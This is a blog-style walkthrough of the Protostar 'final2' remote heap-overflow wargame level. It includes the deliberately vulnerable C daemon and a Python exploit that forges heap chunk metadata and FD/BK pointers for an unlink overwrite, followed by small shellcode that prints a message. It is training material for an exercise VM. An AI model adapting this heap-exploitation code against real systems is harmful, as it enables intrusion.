hii readers,
Today In This post, I am going to share with you my walk through experience of Exploit Exercise Proto Star Final2 Level.
Before Starting Our Walkthrough Let's Take a Look At Hints And Details.
Today In This post, I am going to share with you my walk through experience of Exploit Exercise Proto Star Final2 Level.
Before Starting Our Walkthrough Let's Take a Look At Hints And Details.
Note: I want to highlight Few Points.
- I'm not the creator of protostar war game. I am just a player.
- Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
- Understand all previous levels before starting this one.
- Do some research on Assembly, C/C++ and Gdb
- Do Some Research About Heap overflow exploitation.
- All Credit Related To Exploit Exercise War Games Goes To exploit-exercises.com.
let's Start
Nothing more!
Source Codes
#include "../common/common.c"
#include "../common/malloc.c"
#define NAME "final2"
#define UID 0
#define GID 0
#define PORT 2993
#define REQSZ 128
void check_path(char *buf)
{
char *start;
char *p;
int l;
/*
* Work out old software bug
*/
p = rindex(buf, '/');
l = strlen(p);
if(p) {
start = strstr(buf, "ROOT");
if(start) {
while(*start != '/') start--;
memmove(start, p, l);
printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
"yes" : "no", start - buf);
}
}
}
int get_requests(int fd)
{
char *buf;
char *destroylist[256];
int dll;
int i;
dll = 0;
while(1) {
if(dll >= 255) break;
buf = calloc(REQSZ, 1);
if(read(fd, buf, REQSZ) != REQSZ) break;
if(strncmp(buf, "FSRD", 4) != 0) break;
check_path(buf + 4);
dll++;
}
for(i = 0; i < dll; i++) {
write(fd, "Process OK\n", strlen("Process OK\n"));
free(destroylist[i]);
}
}
int main(int argc, char **argv, char **envp)
{
int fd;
char *username;
/* Run the process as a daemon */
background_process(NAME, UID, GID);
/* Wait for socket activity and return */
fd = serve_forever(PORT);
/* Set the client socket to STDIN, STDOUT, and STDERR */
set_io(fd);
get_requests(fd);
}
Hint
Remote heap level :)
Core files will be in /tmp.
This level is at /opt/protostar/bin/final2
Vulnerable Function
/*
* Work out old software bug
*/
p = rindex(buf, '/');
l = strlen(p);
if(p) {
start = strstr(buf, "ROOT");
if(start) {
while(*start != '/') start--;
memmove(start, p, l);
printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
"yes" : "no", start - buf);
}
Planing
Well, Solving This Challenge was really very fun and amazing. As we can see, No need to find vulnerable function and if you have done, heap levels honestly then this level is just a piece of cake.Nothing more!
Exploit
import struct
import socket
# Total Buff 128
# ==========================================
# | Buff(128) | -8(4) | -4 | FD | BR |
# ==========================================
# First Buff
payload = 'FSRDBBBB'
# push 0x804e0ae
# ret
payload+= '\xB8\x98\xE0\x04\x08\xFF\xE0'
# '\xB8\xB2\xE0\x04\x08\xFF\xE0'
# '\xB8\xAE\xE0\x04\x08\xFF\xE0'
# '\x68\xAE\xE0\x04\x08\xC3' # Limited size (8 bytes)Shellcode
payload+= 'B'*(128-len(payload)-1)
payload+= '/'
payload1 = payload
# Second Payload
payload = 'FSRD'
payload+= 'ROOT'
payload+= '\x90'*4
payload+= '/'
payload+= struct.pack("i", -8)
payload+= struct.pack("i", -4)
payload+= struct.pack("i",0x0804d41c-12) # FD
payload+= struct.pack('I', 0x804e010) # Bk
"""
0: 31 c0 xor eax,eax
2: 31 db xor ebx,ebx
4: 31 c9 xor ecx,ecx
6: 31 d2 xor edx,edx
8: b0 04 mov al,0x4
a: b3 01 mov bl,0x1
c: 68 64 21 21 21 push 0x21212164
11: 68 4f 77 6e 65 push 0x656e774f
16: 89 e1 mov ecx,esp
18: b2 08 mov dl,0x8
1a: cd 80 int 0x80
1c: b0 01 mov al,0x1
1e: 31 db xor ebx,ebx
20: cd 80 int 0x80
"""
shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x68\x64\x21\x21\x21\x68\x4f\x77\x6e\x65\x89\xe1\xb2\x08\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
payload+= '\xeb\x0f'
payload+= '\x90'*20 # 90-bytes Shellcode here
payload+= shellcode
payload+= '\xcc'*(128-len(payload))
print payload1+payload